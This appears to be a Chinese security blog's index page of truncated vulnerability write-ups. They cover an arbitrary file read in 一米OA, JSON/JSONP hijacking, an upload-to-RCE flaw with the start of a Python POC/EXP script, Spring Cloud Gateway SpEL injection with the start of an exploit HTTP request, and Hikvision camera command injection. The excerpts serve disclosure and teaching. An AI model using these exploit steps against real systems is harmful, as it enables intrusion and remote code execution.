漏洞描述一米OA getfile.jsp文件过滤不足且对权限验证不严格,导致任意文件读取漏洞。漏洞影响一米OA网络测绘app="一米OA"漏洞复现出现漏洞的文件如下:<%@ page contentType="text/html;charset=utf-8" %> <%@page import="cn.js.fan.util.*" %> <%@page import="cn.js.fan.web.Global" %> <%@page import="com.redmoon.oa.*" %> <%@page import="java.io.*" %> <jsp:useBean id="fchar" scope="page" class="cn.js.fan.util.StrUtil"/> <jsp:useBean id="f
简介恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者。一般来说进行劫持的JSON数据都是包含敏感信息或者有价值的数据。分类属于CSRF漏洞。JSON劫持原理条件受攻击的网站URL返回一个JSON对象或者数组。受攻击的网站能够通过GET请求返回JSON数据(最方便),POST也行不过需要钓鱼诱导。受害人的浏览器没有禁用javascript。受害人浏览了钓鱼/恶意网站,并且受害人在受攻击的网站中,保存在COOKIE中的身份验证信息尚未清除。受攻击的站点没有做相关的防御措施。分类主要有两类:JSON劫持:主流浏览器有一定的防护、构造方法较为麻烦。JSONP劫持:JSONP是一种非官方的JSON劫持场景攻击手法这个劫持的原理是利用了<script>标签会自动执行js代码的原理,从而调用页面内嵌的恶意函数,将数据发送至攻击者的服务器。从而导致信息泄露。但是现在主流的浏览器都对这种类型的JSON劫持进行了一定的防御,未能成功复现,故可能无效。场景:服务端(http://A.xx/getjson)header('Content-type
原理文件上传点存在一个白名单,在白名单之外的内容会被添加后缀并base64编码文件内容,编码后的文件会获得一个id,通过webmain/task/runt/qcloudCosAction.php中的qcloudCosAction类的run方法,提供对应的id即可复原后缀和内容,从而导致上传的文件被解析。危害攻击者可获得系统的完整访问权限。POC & EXPimport requests session = requests.session() url_pre = 'http://x.x.x.x/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=
原理启用和暴露Gateway Actuator端点时,可用恶意的SpEL表达式被嵌入路由路径,在刷新路由时导致RCE。参考文章:https://blog.csdn.net/m0_61506558/article/details/126914956影响范围Spring Cloud Gateway < 3.1.1Spring Cloud Gateway < 3.1.7Spring Cloud Gateway 2.x危害远程攻击者可利用该漏洞可以发出恶意的请求,允许在远程主机上执行任意远程命令。POC & EXP手工# 1. 请求http://x.x.x.x:x/actuator,确认端口开启 # 2. 新建一个路由,注入恶意的SpELl表达式,返回状态码应为201 Created POST /actuator/gateway/routes/test HTTP/1.1 Host: x.x.x.x:x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
原理由于摄像头对传入的字符串未做进一步确认,导致恶意的命令被注入到正常命令中。参考文章:https://kms.app/archives/399/影响范围DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build
Equinox
一个乐于分享的网安人